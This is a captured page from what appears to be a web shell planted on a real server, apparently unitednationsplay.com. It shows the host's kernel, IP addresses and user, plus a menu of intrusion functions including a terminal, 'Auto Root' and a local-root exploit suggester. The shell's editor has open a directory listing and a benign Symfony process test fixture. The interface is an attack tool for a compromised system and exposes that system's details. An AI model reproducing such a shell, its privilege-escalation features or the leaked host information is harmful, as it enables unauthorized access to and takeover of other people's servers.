Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.73.229
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-test /
vendor /
symfony /
process /
Tests /
Delete
Unzip
Name
Size
Permission
Date
Action
ExecutableFinderTest.php
4.19
KB
-rw-r--r--
2018-11-20 16:22
KillableProcessWithOutput.php
549
B
-rw-r--r--
2018-11-20 16:22
NonStopableProcess.php
1.04
KB
-rw-r--r--
2018-11-20 16:22
PhpExecutableFinderTest.php
1.32
KB
-rw-r--r--
2018-11-20 16:22
PhpProcessTest.php
1.26
KB
-rw-r--r--
2018-11-20 16:22
PipeStdinInStdoutStdErrStreamSelect.php
1.71
KB
-rw-r--r--
2018-11-20 16:22
ProcessFailedExceptionTest.php
5.03
KB
-rw-r--r--
2018-11-20 16:22
ProcessTest.php
46.21
KB
-rw-r--r--
2018-11-20 16:22
SignalListener.php
398
B
-rw-r--r--
2018-11-20 16:22
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ define('ERR_SELECT_FAILED', 1); define('ERR_TIMEOUT', 2); define('ERR_READ_FAILED', 3); define('ERR_WRITE_FAILED', 4); $read = array(STDIN); $write = array(STDOUT, STDERR); stream_set_blocking(STDIN, 0); stream_set_blocking(STDOUT, 0); stream_set_blocking(STDERR, 0); $out = $err = ''; while ($read || $write) { $r = $read; $w = $write; $e = null; $n = stream_select($r, $w, $e, 5); if (false === $n) { die(ERR_SELECT_FAILED); } elseif ($n < 1) { die(ERR_TIMEOUT); } if (in_array(STDOUT, $w) && strlen($out) > 0) { $written = fwrite(STDOUT, (string) $out, 32768); if (false === $written) { die(ERR_WRITE_FAILED); } $out = (string) substr($out, $written); } if (null === $read && '' === $out) { $write = array_diff($write, array(STDOUT)); } if (in_array(STDERR, $w) && strlen($err) > 0) { $written = fwrite(STDERR, (string) $err, 32768); if (false === $written) { die(ERR_WRITE_FAILED); } $err = (string) substr($err, $written); } if (null === $read && '' === $err) { $write = array_diff($write, array(STDERR)); } if ($r) { $str = fread(STDIN, 32768); if (false !== $str) { $out .= $str; $err .= $str; } if (false === $str || feof(STDIN)) { $read = null; if (!feof(STDIN)) { die(ERR_READ_FAILED); } } } }